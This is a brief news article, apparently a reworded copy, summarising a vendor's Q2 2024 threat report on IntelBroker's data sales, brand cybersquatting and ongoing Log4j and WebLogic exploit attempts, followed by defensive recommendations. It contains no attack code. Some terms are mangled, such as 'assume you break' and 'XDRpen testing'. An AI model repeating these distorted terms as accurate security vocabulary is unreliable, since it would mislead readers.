Top 3 Threat Reports for Q2 2024

September 12, 2024Hacker newsThreat Intelligence / Cybercrime

Cato CTRL (Cyber ​​​​Threats Research Lab) released its Cato CTRL SASE Threat Report Q2 2024. The report highlights key findings based on an analysis of a staggering 1.38 trillion network flows across more than 2,500 Cato clients worldwide between April and June 2024.

Highlights from the Q2 2024 Cato CTRL SASE Threat Report

The report is packed with unique insights based on thorough analysis of network traffic data. Three top ideas for businesses are as follows.

1) IntelBroker: A constant threat in the cyber underground

During an in-depth investigation of the hacker community and the dark web, Cato CTRL identified a notorious threat known as IntelBroker. IntelBroker is a prominent figure and moderator in the BreachForums hacker community and has been heavily involved in selling data and source code to large organizations. These include AMD, Apple, Facebook, KrypC, Microsoft, Space-Eyes, T-Mobile, and the US Army Air and Missile Command.

2) 66% of brand spoofing is focused on Amazon

Cybersquatting is counterfeiting and using a brand’s domain name to profit from a registered trademark. The report found that Amazon was the most frequently spoofed brand, with 66% of such domains targeting the retail giant. Google followed, albeit in second place, with 7%.

3) Log4j Nevertheless Being exploited

Although the Log4j vulnerability was discovered in 2021, it remains a favorite tool among threat actors. From Q1 to Q2 2024, Cato CTRL recorded a 61% increase in Log4j exploit attempts in inbound traffic and a 79% increase in WAN traffic. Similarly, an Oracle WebLogic vulnerability first discovered in 2020 saw a 114% increase in exploit attempts in WAN traffic over the same period.

Safety recommendations

Based on the report’s findings, Cato CTRL advises organizations to adopt the following best practices:

1. Regularly monitor dark web forums and marketplaces for any mention of selling your company’s data or credentials.
2. Use tools and techniques to detect and combat phishing and other attacks that use cybersquat.
3. Create a proactive patching schedule focused on critical vulnerabilities, especially those actively targeted by threat actors such as Log4j.
4. Create a step-by-step data breach response plan.
5. Adopt an “assume you break” mentality with techniques like ZTNA, XDRpen testing and more.
6. Develop an AI management strategy.

Read the additional guidelines for more details in the report.